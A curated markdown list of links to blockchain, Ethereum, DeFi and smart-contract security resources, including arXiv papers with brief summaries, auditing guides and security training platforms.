- [Public APIs](https://github.com/public-apis/public-apis#cryptocurrency)
- [BTC List](https://github.com/igorbarinov/awesome-bitcoin)
- [ConsenSys](https://github.com/ConsenSys/ethereum-developer-tools-list)
- [EVM Tools](https://github.com/CoinCulture/evm-tools)
- [Solidity Pro](https://github.com/bkrem/awesome-solidity)
- [Zhihu Research Base](https://zhuanlan.zhihu.com/p/265374061)
- [OpenZeppelin - Contracts / Test Helpers + More ](https://github.com/OpenZeppelin)
- [Awesome Ethereum Resource Lists](https://medium.com/quiknode/awesome-ethereum-resource-lists-dd28a9c17fc1)
- [Comprehensive Ethereum Developer Resource List](https://github.com/ConsenSys/ethereum-developer-tools-list/blob/master/README.md)
- [Smart Contract Learning](https://github.com/arbazkiraak/SmartContractLearning)
- [Awesome Cryptoeconomics](https://github.com/jpantunes/awesome-cryptoeconomics)
- [Tudelft Repo](https://repository.tudelft.nl)
- [The Reading List](https://www.decentralised.co/the-reading-list) and [This repo](https://github.com/sambacha/compendium) with [Engineering Data List](https://github.com/sambacha/art-of-engineering/blob/master/ENGINEERING_ART_OF.md)
- [Eth Reentrancy Attack Patterns](https://github.com/uni-due-syssec/eth-reentrancy-attack-patterns)
- [Plugin for testing smart contracts](https://github.com/meherett/pytest-eth)
- [Solidity function profiler](https://github.com/EricR/sol-function-profiler)
- [Smart Contract Attack Vectors](https://github.com/KadenZipfel/smart-contract-attack-vectors)
- [DeFi security list](https://github.com/freight-chain/defi-sec)
- [DeFi Threats Base](https://github.com/freight-trust/defi-threat)
- [Hacking](https://github.com/geekshiv/Smart-Contract-Hacking)
- [Secureum Bootcamp](https://hackmd.io/@secureum/bootcamp-epoch0-announcement)
- [SCSVS](https://github.com/securing/SCSVS)
- [Smart Contract Inspector](https://github.com/tintinweb/smart-contract-inspector)
- [Blocksec ctfs](https://github.com/openblocksec/blocksec-ctfs)
- [Builder List](https://based.builders)
- [From 0 to Web3.0](https://github.com/kay-is/web3-from-zero)
#### Security & Safety:
- [All known smart contract side and user side attacks](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)
- [All ETH Sec tools existing](https://graph.org/ETHSec-Tools-02-13)
- [Solidity Cheatsheet Pack](https://graph.org/Solidity-Cheatsheets-Pack-03-20)
- [All about NFT security](https://graph.org/NFT-security-01-28)
- [Visit my Blog](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)
- [Visit blog.pessimistic.io](https://blog.pessimistic.io/)
- [All resources to become a smart contract auditor!](https://telegra.ph/All-resources-to-become-a-smart-contract-auditor-09-11)
- [How to become a smart contract auditor](https://cmichel.io/how-to-become-a-smart-contract-auditor)
- [Blockchain Security Genesis](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html)
- [Intro security hacking smart contracts on Ethereum](https://www.notonlyowner.com/learn/intro-security-hacking-smart-contracts-ethereum)
- [Books & Researches](https://telegra.ph/Books--Researches-01-30)
- [Per Aspera ad Astra](https://officercia.mirror.xyz/FvMKbibx7gDlufgZSkmYn77CI8HPBsVCeqUKmpXHr0k)
#
- [Blockchain Security Roadmap](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html) - This article will be laying down a path/roadmap, following which users will easily enter into the field of Blockchain Security together.
- [ The Eye of Horus: Spotting and Analyzing Attacks on Ethereum Smart Contracts](https://arxiv.org/pdf/2101.06204.pdf) -Investigation shows that the number of attacks did not necessarily decrease over the past few years, but for some vulnerabilities remained constant.
- [Analysis of Bitcoin Vulnerability to Bribery Attacks Launched Through Large Transactions](https://arxiv.org/pdf/2105.07501.pdf) - In this paper, authors design a novel bribery attack and show that this guarantee can be hugely undermined.
- [Vulnerability of Blockchain Technologies to Quantum Attacks](https://arxiv.org/pdf/2105.01815.pdf) - Here authors analyze the major blockchain-based cryptocurrencies deployed today -- including Bitcoin, Ethereum, Litecoin and ZCash, and determine risk exposure to quantum attacks.
- [BLOCKEYE](https://arxiv.org/pdf/2103.02873.pdf) - Hunting For DeFi Attacks on Blockchain. In this paper, authors proposed BLOCKEYE, a real-time attack detection system for DeFi projects on the Ethereum blockchain.
- [Topological Anomaly Detection in Dynamic Multilayer Blockchain Networks](https://arxiv.org/pdf/2106.01806.pdf) - Authors introduce a new topological perspective to structural anomaly detection in dynamic multilayer networks.
- [Verification of the Incremental Merkle Tree Algorithm with Dafny](https://arxiv.org/pdf/2105.06009.pdf) - Authors present our new and original correctness proof of the algorithm along with the Dafny machine-checkable version.
- [GoHammer Blockchain Performance Test Tool](https://arxiv.org/pdf/2105.00847.pdf) - This tool will help in developing more efficient decentralized systems and will affect decreasing the costs of developing decentralized application projects.
- [EtherClue: Digital investigation of attacks on Ethereum smart contracts ](https://arxiv.org/pdf/2104.05293.pdf) - In this work, authors study the problem of post-factum investigation of Ethereum attacks using Indicators of Compromise specially crafted for use in the blockchain.
- [Requirement Analyses and Evaluations of Blockchain Platforms per Possible Use Cases](https://arxiv.org/pdf/2103.03209.pdf) - This document provides a generic model of understanding blockchain and its applications.
- [A Note on Privacy in Constant Function Market Makers](https://arxiv.org/pdf/2103.01193.pdf) - In this note, authors show that privacy is impossible with the usual implementations of CFMMs under most reasonable models of an adversary and provide some mitigating strategies.
- [A Survey of Security Vulnerabilities in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.06974.pdf) - This paper explains eight vulnerabilities that are specific to the application level of BT by analyzing the exploitation case scenarios of these vulnerabilities.
- [An approach to detect Denial of Service Vulnerability in Ethereum Smart Contracts](https://arxiv.org/pdf/2106.01340.pdf) - In this paper, authors propose a framework that combines static and dynamic analysis to detect DoS due to an unexpected revert in ETH Smart Contracts.
- [AGSolT: a Tool for Automated Test-Case Generation for Solidity Smart Contracts](https://arxiv.org/pdf/2102.08864.pdf) - Authors found that AGSolT is capable of achieving high branch overage with both approaches and even discovered some errors in some of the most popular Solidity smart contracts on Github.
- [Temporal-Amount Snapshot MultiGraph for Ethereum Transaction Tracking](https://arxiv.org/pdf/2102.08013.pdf) - Authors propose TASMG to model Ethereum transaction records as a temporal-amount network and then present TAW to effectively embed accounts via their transaction records, which integrates temporal and amount information of the proposed network.
- [Demystifying Cryptocurrency Mining Attacks: A Semi-supervised Learning Approach Based on Digital Forensics and Dynamic Network Characteristics](https://arxiv.org/pdf/2102.10634.pdf) - This paper addresses the detection of crypto mining attacks in a generic network environment using dynamic network characteristics.
- [FASTEN: Fair and Secure Distributed Voting Using Smart Contracts](https://arxiv.org/pdf/2102.10594.pdf) - Authors prove that the probability of privacy breaches is negligibly small. Further, cost analysis of executing FASTEN over Ethereum is comparable to most of the existing cost of elections.
- [Interdependencies between Mining Costs, Mining Rewards and Blockchain Security](https://arxiv.org/pdf/2102.08107.pdf) - This paper studies to what extent the cost of operating a proof-of-work blockchain is intrinsically linked to the cost of preventing attacks, and to what extent the underlying digital ledger security budgets are correlated with the cryptocurrency market outcomes
- [HyperSec: Visual Analytics for blockchain security monitoring](https://arxiv.org/pdf/2103.14414.pdf) - HyperSec, a visual analytics monitoring tool that provides relevant information at a glance to detect ongoing attacks on Hyperledger Fabric.
- [Reentrancy Vulnerability Identification in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.02881.pdf) - In this paper, authors present a framework that combines static and dynamic analysis to detect Reentrancy vulnerabilities in Ethereum smart contracts.
- [A General Framework for the Security Analysis of Blockchain Protocols](https://arxiv.org/pdf/2009.09480v2.pdf) - This paper presents a parsimonious abstraction sufficient for capturing and comparing properties of many well-known permissionless blockchain protocols.
- [Coinbugs: Enumerating Common Blockchain Implementation-Level Vulnerabilities](https://arxiv.org/pdf/2104.06540.pdf) - The paper is aimed at security testers aiming to start out in blockchain security reviews and blockchain developers as a reference on common pitfalls.
- [Vulnerabilities and Open Issues of Smart Contracts: A Systematic Mapping](https://arxiv.org/pdf/2104.12295.pdf) - This paper conducted a systematic literature mapping identifying initiatives and tools to analyze SCs and how to deal with the identified vulnerabilities.
- [SuMo: A Mutation Testing Strategy for Solidity Smart Contracts](https://arxiv.org/pdf/2105.03626.pdf) - Authors report a first evaluation of SuMo on open-source projects for which test suites were available. The results authors got are encouraging, and they suggest that SuMo can effectively help developers to deliver more reliable smart contracts.
- [(In)Stability for the Blockchain: Deleveraging Spirals and Stablecoin Attacks](https://arxiv.org/pdf/1906.02152.pdf) - The possibility of deleveraging spirals was first predicted in the initial release of this paper in 2019 and later observed in the Black Thursday crisis in Dai in 2020.
- [An Anonymous Trust-Marking Scheme on Blockchain Systems](https://arxiv.org/pdf/2010.00206.pdf) - In this paper, authors propose an anonymous trust-marking scheme on blockchain systems that is universally applicable to any cryptocurrency.
- [A Framework and DataSet for Bugs in Ethereum Smart Contracts](https://arxiv.org/pdf/2009.02066.pdf) - In this paper, to fill the gap, authors first collect as many smart contract bugs as possible from multiple sources and divide these bugs into 9 categories by extending the IEEE Standard Classification for Software Anomalies.
- [Bitwise Operations and Bit Manipulation in Solidity, Ethereum](https://medium.com/@imolfar/bitwise-operations-and-bit-manipulation-in-solidity-ethereum-1751f3d2e216)
- [BitMaps](https://soliditydeveloper.com/bitmaps)
- [Reentrancy Guard 2.0](https://medium.com/spherex-technologies/reentrancy-guard-2-0-cbbc0be41634)
- [A Secure Multi-chains Consensus Scheme Against Diverse Miners Behaviors Attacks in Blockchain Networks.](https://arxiv.org/pdf/2106.02383.pdf) - Experimental results show that PoDT is secure against DMB attacks and more effective than traditional consensus schemes in multi-chains environments.
- [A Survey on Consortium Blockchain Consensus Mechanisms](https://arxiv.org/pdf/2102.12058.pdf) - This paper highilights several state-of-the art solutions in consensus algorithms for enterprise blockchain.
- [Extracting Smart Contracts Tested and Verified in Coq](https://arxiv.org/pdf/2012.09138.pdf) - Authors implement extraction of Coq programs to functional languages based on MetaCoq's certified erasure.
- [Trustless, privacy-preserving blockchain bridges](https://arxiv.org/pdf/2102.04660.pdf) - In this paper, authors present a protocol for facilitating trust-less cross-chain cryptocurrency transfers that preserve privacy of bridge withdrawals.
- [Security checklists for Ethereum smart contract development: patterns and best practices](https://arxiv.org/pdf/2008.04761.pdf) - Authors cover the phases of design, coding, and testing and deployment of the software lifecycle.
- [Dynamic Vulnerability Detection on Smart Contracts Using Machine Learning](https://arxiv.org/pdf/2102.07420.pdf) - In this work authors propose Dynamit, a monitoring framework to detect reentrancy vulnerabilities in Ethereum smart contracts.
- [Targeting the Weakest Link: Social Engineering Attacks in Ethereum Smart Contracts](https://arxiv.org/pdf/2105.00132.pdf) - In this work, authors explore the possibility and existence of new social engineering attacks beyond smart contract honeypots.
- [OptSmart: A Space Efficient Optimistic Concurrent Execution of Smart Contracts](https://arxiv.org/pdf/2102.04875.pdf) - In this paper, authors develop a concurrent miner that proposes a block by executing the AUs concurrently using optimistic Software Transactional Memory systems (STMs).
- [DEFECTCHECKER: Automated Smart Contract Defect Detection by Analyzing EVM Bytecode](https://arxiv.org/pdf/2009.02663.pdf) - Experimental results show that DefectChecker performs much better than these tools in terms of both speed and accuracy.
- [SmartBugs: A Framework to Analyze Solidity Smart Contracts](https://arxiv.org/pdf/2007.04771.pdf) - Authors show how it enables easy integration and comparison of analysis tools by presenting a new extension to the tool SmartCheck that improves substantially the detection of vulnerabilities related to the DASP10 categories Bad Randomness, Time Manipulation, and Access Control (identified vulnerabilities increased from 11% to 24%).
- [Profiling Gas Leaks in Solidity Smart Contracts](https://arxiv.org/pdf/2008.05449.pdf) - In this paper, authors identify a set of 19 Solidity code smells affecting the deployment and transaction costs of a smart contract, and assess the relevance of such smells through a survey involving 34 participants.
- [Securing Parallel-chain Protocols under Variable Mining Power](https://arxiv.org/pdf/2105.02927.pdf) - In this paper, authors consider the design of provably secure parallel-chain protocols which can adapt to such mining power variations.
- [Ethereum SmartContract Vulnerability Detection using Deep Neural Network and Transfer Learning](https://arxiv.org/pdf/2103.12607.pdf) - ESCORT framework enables transfer learning on new vulnerability types with minimal modification of the DNN model architecture and re-training overhead.
- [SCSGuard: Deep Scam Detection for Ethereum Smart Contracts](https://arxiv.org/pdf/2105.10426.pdf) - Experimental results manifest that SCSGuard achieves high accuracy (0.94), precision (0.96\%) and recall (0.98) for both Ponzi and Honeypot scams, and new Phishing smart contracts.
- [Securing Cyber-Physical Systems Through Blockchain-Based Digital Twins and Threat Intelligence](https://arxiv.org/pdf/2105.08886.pdf) - This article focuses on securing CPSs by integrating Artificial Intelligence (AI) and blockchain for intelligent and trusted DTs.
- [A Survey on Blockchain Interoperability: Past, Present, and Future Trends](https://arxiv.org/abs/2005.14282) - In this post, authors study blockchain interoperability techniques and solutions, providing a holistic overview of blockchain interoperability, paving the way for systematic research in this domain.
- [SoK: Transparent Dishonesty: front-running attacks on Blockchain](https://arxiv.org/abs/2106.00667) - A paper on secure smart contract designs decisions and front-running possibilities on DApps.
- [SoK: Oracles from the Ground Truth to Market Manipulation](https://arxiv.org/abs/2106.00667) - A paper that systemizes the design alternatives for oracles, showcases attacks, and discusses attack mitigation strategies.
##### Web2 cybersecurity
- [TryHackMe: Complete rooms with challenges and puzzles to break, all from the browser](https://tryhackme.com/welcome) - Hands on cybersecurity training with real-world tasks
- [Disclose: Cross-industry and vendor-agnostic standards for best practives in cybersecurity research](https://disclose.io/) - Open source maintainers and industry experts providing a central source for assistance, information, and help via templates, tools, data sets...
- [Hack The Box](https://www.hackthebox.com/) - A Hacker's playground to dynamically and compete against other users in a collaborative ecosystem that promotes hands-on training experience
- [OverTheWire](https://overthewire.org/wargames/) - Set of wargames and challenges offered by a community to learn and practice security concepts in fun wargames.
- [Pentesterlab](https://pentesterlab.com/) - Hands-on labs covering different bu classes from basic to advanced.
- [Portswigger labs](https://portswigger.net/web-security/all-labs) - Set of web application secrity labs with attached community solutions
- [Vulnhub](https://www.vulnhub.com/) - Users upload "challenge boxes" that often attempt to gain root access by exploiting known vulnerabilities.
##### Web3 cybersecurity
- [Ethernaut by OpenZeppelin](https://ethernaut.openzeppelin.com/) - A collection of Web3 wargamees inspired by [OverTheWire](https://overthewire.org/) in the context of the Ethereum Virtual Machine (EVM). Each level is a smart contract that needs to be hacked.
- [Damn Vulnerable Defi](https://www.damnvulnerabledefi.xyz/) - An offensive security playground to learn red team cybersecurity in the context of DeFi and smart contracts. Examples include tasks where the users needs to stop the system from working, take out funds from a contract...
- [Damn Vulnerable DeFi | Foundry](https://github.com/nicolasgarcia214/damn-vulnerable-defi-foundry) - Same as Damn Vulnerable DeFi but in the context of the foundry development framework.
##### Web3 CTF (Capture The Flag)
- [Capture the Ether](https://capturetheether.com/) - Traditional game consisting of a series of categorized challenges where the user earns points after every succesful challenge. The goal is to make the `isComplete()` function return true.
- [Paradigm CTF](https://ctf.paradigm.xyz/)
#### DeFI
- [Finematics](https://www.youtube.com/c/Finematics/featured) - Educational videos on DeFi
- [Formal Analysis of Composable DeFi Protocols ](https://arxiv.org/pdf/2103.00540.pdf) - In this paper, authors propose a formal process-algebraic technique that models DeFi protocols in a compositional manner to allow for efficient property verification.
- [Transaction Fee Mechanism Design](https://arxiv.org/pdf/2106.01340.pdf) - Authors explain the behavior of fees in blockchains.
- [DeFi-ning DeFi: Challenges & Pathway](https://arxiv.org/pdf/2101.05589.pdf) - Good Retrospective into the beginning of decentralized finance.
- [A theory of Automated Market Makers in DeFi](https://arxiv.org/pdf/2102.11350.pdf) - Authors exploit our theory to formally prove a set of fundamental properties of AMMs, characterizing both structural and economic aspects.
- [From banks to DeFi: the evolution of the lending market](https://arxiv.org/pdf/2104.00970.pdf) - Authors discuss the persisting reliance of DeFi lending on the traditional financial system, and conclude with the outlook of the lending market in the IOV era.
- [On the Just-In-Time Discovery of Profit-Generating Transactions in DeFi Protocols](https://arxiv.org/pdf/2103.02228.pdf) -In this paper, authors investigate two methods that allow them to automatically create profitable DeFi trades.
- [Maximizing Extractable Value from Automated Market Makers](https://arxiv.org/pdf/2106.01870.pdf) - In this paper authors formally characterize rational miners as players which follow an optimal strategy in the mining game.
- [The Decentralized Financial Crisis](https://arxiv.org/pdf/2002.08099.pdf) - In this paper authors explore how design weaknesses and price fluctuations in DeFi protocols could lead to a DeFi crisis.
- [Liquidations: DeFi on a Knife-edge](https://arxiv.org/pdf/2009.13235v4.pdf)- In order to protect protocols from suffering losses, undercollateralized positions can be liquidated. In this paper, authors present empirical analysis of liquidations on protocols for loanable funds (PLFs).
- [Measuring Asset Composability as a Proxy for DeFi Integration](https://arxiv.org/pdf/2102.04227.pdf) - Authors seek to understand the degree to which this practice may contribute to financial integration on Ethereum by examining transactions in 'composed' derivatives for the assets DAI, USDC, USDT, ETH and tokenized BTC for the full set of 344.8 million Ethereum transactions computed in 2020.
- [Dynamic Curves for Decentralized Autonomous Cryptocurrency Exchanges](https://arxiv.org/pdf/2101.02778.pdf) - Authors propose in this work a new approach to constructing the AMM by proposing the idea of dynamic curves.
- [High-Frequency Trading on Decentralized On-Chain Exchanges](https://arxiv.org/pdf/2009.14021.pdf) - In this work authors formalize, analytically exposit and empirically evaluate an augmented variant of front-running: sandwich attacks, which involve front- and back-running victim TXs.
- [Flashot](https://arxiv.org/pdf/2102.00626.pdf) - A Snapshot of Flash Loan Attack on DeFi Ecosystem.
- [DeFiRanger](https://arxiv.org/pdf/2104.15068.pdf) - Detecting Price Manipulation Attacks on DeFi Applications.
- [Attacking the DeFi Ecosystem with Flash Loans for Fun and Profit](https://arxiv.org/pdf/2003.03810.pdf) - Flash Loans. DeFi. Classic.
- [SoK: Decentralized Finance (DeFi) ](https://arxiv.org/pdf/2101.08778.pdf) - In this Systematization of Knowledge (SoK), authors delineate the DeFi ecosystem along its principal axes. SCSGuard: Deep Scam Detection for Ethereum Smart Contracts
- [Empirical Evidence from four Governance Token Distributions](https://arxiv.org/pdf/2102.10096.pdf) - This paper provides a framework to quantify decentralization of governance power among blockchain applications.
- [The Adoption of Blockchain-based Decentralized Exchanges](https://arxiv.org/pdf/2103.08842.pdf) - Authors show that liquidity providers lose token value if exchange rates are volatile due to the order execution mechanism of the blockchain-based exchange.
- [An analysis of Uniswap markets](https://arxiv.org/pdf/1911.03380.pdf) -One of the best studies on Uniswap DEX activity, authors started researching in 2019 and recently released fresh 2021 analysis.
- [Finance 4.0: Design principles for a value-sensitive cryptoecnomic system to address sustainability](https://arxiv.org/pdf/2105.11955.pdf) - Authors provide new insights on designing crypto systems.
- [Behavior of Liquidity Providers in Decentralized Exchanges](https://arxiv.org/pdf/2105.13822.pdf) - Authors aim to understand how liquidity providers react to market information and how they benefit from providing liquidity in DEX.
- [Cyclic Arbitrage in Decentralized Exchange Markets](https://arxiv.org/pdf/2105.02784.pdf) - Good Read. This paper suggests that with the smart contract technology and the replicated state machine setting of Ethereum, arbitrage strategies are easier implemented in DEXes than in CEX.
- [SoK: Oracles from the Ground Truth to Market Manipulation](https://arxiv.org/pdf/2106.00667.pdf) - In this SoK, authors systemize the design alternatives for oracles, showcase attacks, and discuss attack mitigation strategies.
- [Composing Networks of Automated Market Makers](https://arxiv.org/pdf/2106.00083.pdf) - This paper proposes a mathematical model for AMM composition.
- [Blockchain Oracle Design Patterns](https://arxiv.org/abs/2106.09349) - In this paper, authors will study and analyze blockchain oracles with regard to how they provide feedback to the blockchain and smart contracts.
- [CeFi vs. DeFi - Comparing Centralized to Decentralized Finance](https://arxiv.org/abs/2106.08157) - In this work, authors systematically analyze the differences between CeFi and DeFi, covering legal, economic, security, privacy and market manipulation. Authors also provide a structured methodology to differentiate between a CeFi and a DeFi service.
#### Ethereum Name Service
- [Ethereum Name Service: the Good, the Bad, and the Ugly](https://arxiv.org/pdf/2104.05185.pdf) - Yet, no existing work has studied this emerging system, the security issues and misbehaviors in ENS. Authors present the first study of ENS by analyzing millions of event logs related to ENS.
#### Non-Fungible Token (NFT):
- [Mapping the NFT revolution](https://arxiv.org/pdf/2106.00647.pdf) - Market trends, trade networks and visual features.
- [Fairness in ERC token markets](https://arxiv.org/pdf/2102.03721.pdf) - A Case Study of CryptoKitties.
- [Non-Fungible Token: Overview, Evaluation, Opportunities and Challenges](https://arxiv.org/pdf/2105.07447.pdf) - In this technical report, authors explore the NFT ecosystems in several aspects.
- [Networks of Ethereum Non-Fungible Tokens: A graph-based analysis of the ERC-721 ecosystem](https://arxiv.org/pdf/2110.12545.pdf)
- [NFT School is an open-source project from web developers: NFT Basics, First Steps Tutorial, Minting Service Tutorial](https://nftschool.dev/)
#### Stable-Coins:
- [Stablecoins 2.0](https://arxiv.org/pdf/2006.12388.pdf) - Authors seek to provide a sound foundation for stablecoin theory, with a risk-based functional characterization of the economic structure of stablecoins.
- [Reducing the Volatility of Cryptocurrencies — A Survey of Stablecoins](https://arxiv.org/pdf/2103.01340.pdf) - Authors discuss how stablecoins help reduce the volatility of cryptocurrencies by surveying different types of stablecoins and their stability mechanisms.
- [Understand Volatility of Algorithmic Stablecoin: Modeling, Verification and Empirical Analysis](https://arxiv.org/pdf/2101.08423.pdf) - Authors performed a systematic empirical analysis on real transaction activities of the Basis Cash stablecoin to relate theoretical possibilities to market observations.
- [T-Cash: Transferable Fiat Backed Coins](https://arxiv.org/pdf/2105.04485.pdf) - In this paper authors propose a transferable electronic cash scheme using blockchain technology which allows users to continuously reuse coins within the system.
#### General information:
- [A Big Data Analysis of the Ethereum Network: from Blockchain to Google Trends](https://arxiv.org/pdf/2104.01764.pdf) - An analysis of the crypto prices and search trends suggests the existence of big players (and not the regular users), manipulating the market after a drop in prices.
- [A DLT-based Smart Contract Architecture for Atomic and Scalable Trading](https://arxiv.org/pdf/2105.02937.pdf) - In this paper, authors propose an atomic, scalable and privacy-preserving protocol that enables secure and dynamic updates. Then develop a smart contract-based Credit-Note System (CNS) that allows participants to lock funds before a state channel initialisation, which enhances flexibility and efficiency.
- [Exploring Etherum Data Stores: A Cost and Performance Comparison ](https://arxiv.org/pdf/2105.10520.pdf) -In this work, authors examine a comprehensive set of data management approaches for ETH apps and assess the associated cost in gas as well as the retrieval performance.
- [A Systematic Literature Review on Blockchain Governance](https://arxiv.org/pdf/2105.05460.pdf) - This study comprehensively investigates blockchain governance via 5W1H questions.
- [A general framework for blockchain analytics](https://arxiv.org/pdf/1707.01021.pdf) - Authors propose a general-purpose framework, supporting data analytics on Bitcoin Ethereum — it allows to integrate block data with data from other sources, and to organise them in a database.
- [AMR:Autonomous Coin Mixer with Privacy Preserving Reward Distribution](https://arxiv.org/pdf/2010.01056.pdf) - In this work, authors propose the first censorship resilient mixer, which can reward its users in a privacy-preserving manner for participating in the system.
- [Technology Review of Blockchain Data Privacy Solutions](https://arxiv.org/pdf/2105.01316.pdf)- This report aims to review existing enterprise blockchain technologies: EOSIO powered systems, Hyperledger Fabric and Besu, Consensus Quorum, R3 Corda and Ernst and Young’s Nightfall.
- [Blockchain Systems, Technologies and Applications: A Methodology Perspective](https://arxiv.org/pdf/2105.03572.pdf) - First, this article introduces how blockchain works, the research activity and challenge, and illustrates the roadmap involving the classic methodology with typical blockchain use cases and topics. Second, in blockchain system, how to adopt stochastic process, game theory, optimization, machine learning and cryptography to study blockchain running process and design blockchain protocol/algorithm are discussed in details.
- [Ethna: Analyzing the Underlying Peer-to-Peer Network of the Ethereum Blockchain](https://arxiv.org/pdf/2010.01373.pdf) - Ethna implements a novel method that accurately measures the degrees of Ethereum nodes.
- [Community Detection in Blockchain Social Networks](https://arxiv.org/pdf/2101.06406.pdf) - A novel community detection algorithm which is designed for low-rank signals on graph can help find users’ communities based on user-token subscription.
- [Block Access Control in Wireless Blockchain Network: Design, Modeling and Analysis](https://arxiv.org/pdf/2104.13144.pdf) - The results show that BAC approaches can help the network to achieve a high transaction throughput while improving block utilization and saving computational power. Meanwhile, the trade-off between transaction throughput and block utilization is demonstrated, which can act as a guidance for practical deployment of blockchain.
- [Towards External Calls for Blockchain and Distributed Ledger Technology](https://arxiv.org/pdf/2105.10399.pdf) - In this paper authors show that this belief is preconceived by demonstrating a method that enables blockchain and distributed ledger technologies to perform calls to external systems initiated from the blockchain/DLT itself.
- [Managing Blockchain Systems and Applications: A Process Model for Blockchain Configurations](https://arxiv.org/pdf/2105.02118.pdf) - Authors demonstrate the applicability of the proposed blockchain configuration process model on four blockchain projects
- [A Note on Optimal Fees for Constant Function Market Makers](https://arxiv.org/pdf/2105.13510.pdf) - Authors present framework that can be used to compute optimal fees for real world pools using past trade data.
- [Reward Mechanism for Blockchains Using Evolutionary Game Theory](https://arxiv.org/pdf/2104.05849.pdf) - In this paper, authors develop a reward mechanism framework that could apply to many PoS blockchains.
- [Summing Up Smart Transitions](https://arxiv.org/pdf/2105.07663.pdf) - In this paper, authors present a generalization of first-order logic which can express the unbounded sum of balances.
- [100+ Metrics for Software Startups - A Multi-Vocal Literature Review](https://arxiv.org/pdf/1901.04819.pdf) - Using data in the form of metrics can help software startups to make the right decisions amidst uncertainty and limited resources.
- [Blockchain Networks: Data Structures of Bitcoin , Monero, Zcash, Ethereum, Ripple and IOTA](https://arxiv.org/pdf/2103.08712.pdf) - Authors discuss how blockchain data can be abstracted as various types of networks, and how network abstractions used to reap insights into the structure.
- [Decentralized Finance: On Blockchain- and Smart Contract-Based Financial Markets](https://research.stlouisfed.org/publications/review/2021/02/05/decentralized-finance-on-blockchain-and-smart-contract-based-financial-markets) - Written by Fabian Schar, gives an overview of blockchain based markets with technical details but in a digestable format; great paper for new comers to the space.
#### Special Author's compilations:
- [All-about-NFT security](https://graph.org/NFT-security-01-28)
- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)
- [All good TG Dev communities](https://graph.org/Crypto-Telegram-Channels--Chats-04-19)
- [Known smart contract-side and user-side attacks](https://graph.org/Data-02-14)
- [Solidity A-Z](https://graph.org/Solidity-Cheatsheets-Pack-03-20)
- [All known smart contract side and user side attacks](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)
- [All possible transaction analysis, crypto-forensics and investigation tools list & references in a single note](https://graph.org/TX-Analysis-tools-04-19)
- [Key principles of storing crypto cold wallet attacks defense methods best practices](https://graph.org/Key-principles-of-storing-crypto-cold-wallet-attacks-defense-methods-best-practices--Bonus-04-23)
#### Side-Chains
- [POA Network](https://www.poa.network/)
- [POA Bridge](https://bridge.poa.net/)
- [POA Bridge UI](https://github.com/poanetwork/bridge-ui)
- [POA Bridge Contracts](https://github.com/poanetwork/poa-bridge-contracts)
- [Loom Network](https://github.com/loomnetwork)
- [Polygon Network](https://docs.polygon.technology/)
#### EIP - 1559
- [EIP1559 FAQ](https://notes.ethereum.org/@vbuterin/eip-1559-faq) - EIP1559 FAQ
- [Dynamical Analysis of the EIP-1559 Ethereum Fee Market](https://arxiv.org/pdf/2102.10567.pdf)- Authors perform a thorough analysis of the resulting fee market dynamic mechanism via a combination of tools from game theory and dynamical systems.
- [Stochastic Properties of EIP1559 Basefees](https://arxiv.org/pdf/2105.03521.pdf) - Authors explain the new pricing mechanism for the Ethereum developed to bring stability to fluctuating gas prices.
- [Transaction Fee Mechanism Design for the Ethereum Blockchain: An Economic Analysis of EIP-1559](https://arxiv.org/pdf/2012.00854.pdf) - This report assesses the game-theoretic strengths and weaknesses of the proposal and explores some alternative designs.
#### Ethereum 2.0
- [How does the NEW Ethereum work?](https://www.preethikasireddy.com/post/how-does-the-new-ethereum-work)
- [How does Ethereum work, anyway?](https://www.preethikasireddy.com/post/how-does-ethereum-work-anyway#Story)
- [Serenity Design Rationale](https://notes.ethereum.org/@vbuterin/serenity_design_rationale)
- [Specification](https://github.com/ethereum/annotated-spec)
- [Beaconcha](https://beaconcha.in/)
- [Beaconscan](https://beaconscan.com/)
- [Ethereum 2.0 Stats](https://eth2stats.io/)
- [Ethereum 2.0 Docs](https://docs.ethhub.io/ethereum-roadmap/ethereum-2.0/eth-2.0-phases/)
- [Ethereum 2.0 Clients](https://docs.ethhub.io/ethereum-roadmap/ethereum-2.0/eth2.0-teams/teams-building-eth2.0/)
- [Ethereum 2.0 Forks](https://eth2-fork-mon.stokes.io/)
#### MEV - Maximal Extractable Value / Miner Extractable Value:
- [Quantifying Blockchain Extractable Value: How dark is the forest?](https://arxiv.org/pdf/2101.05511v2.pdf) - Authors provide evidence that miners already extract Miner Extractable Value (MEV), which could destabilize the blockchain consensus security, as related work has shown.
- [Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges](https://arxiv.org/pdf/1904.05234.pdf) - Introduces the concept of MEV, the work highlights the large, complex risks created by transaction-ordering dependencies in smart contracts and the ways in which traditional forms of financial-market exploitation are adapting to and penetrating blockchain economies.
- [Flashbots: MEV in Eth2](https://hackmd.io/@flashbots/mev-in-eth2) - In this post, authors study transaction ordering in eth2 and analyze MEV-enabled staking yields. Then they find that MEV will significantly boost validator rewards but may reinforce inequalities among participants of eth2. Authors also discuss qualitative aspects of MEV in eth2 such as the potential dynamics that will unfold between its largest stakeholders like exchanges and validator pools.
- [A Survey on Blockchain Interoperability: Past, Present, and Future Trends](https://arxiv.org/abs/2005.14282) - In this post, authors study blockchain interoperability techniques and solutions, providing a holistic overview of blockchain interoperability, paving the way for systematic research in this domain.
#### Discussion
- [SmartContractResearch Forum](https://www.smartcontractresearch.org)
- [ethresear.ch](https://ethresear.ch)
- [ethereum-magicians.org](https://ethereum-magicians.org)
- [speedrunethereum.com](https://speedrunethereum.com)
- [Follow](https://t.me/s/officer_cia/760)
#### Hacks in Web3
- [All Resources to become a smart contract auditor](https://graph.org/All-resources-to-become-a-smart-contract-auditor-09-11)
- [Retrospective: Hacks in Web3](https://officercia.medium.com/retrospective-hacks-in-web3-cc83b8ee0e93)
- [Rekt News](https://rekt.eth.link/leaderboard) - Anonymous platform for whistleblowers and DeFi detectives to present their information to the community.
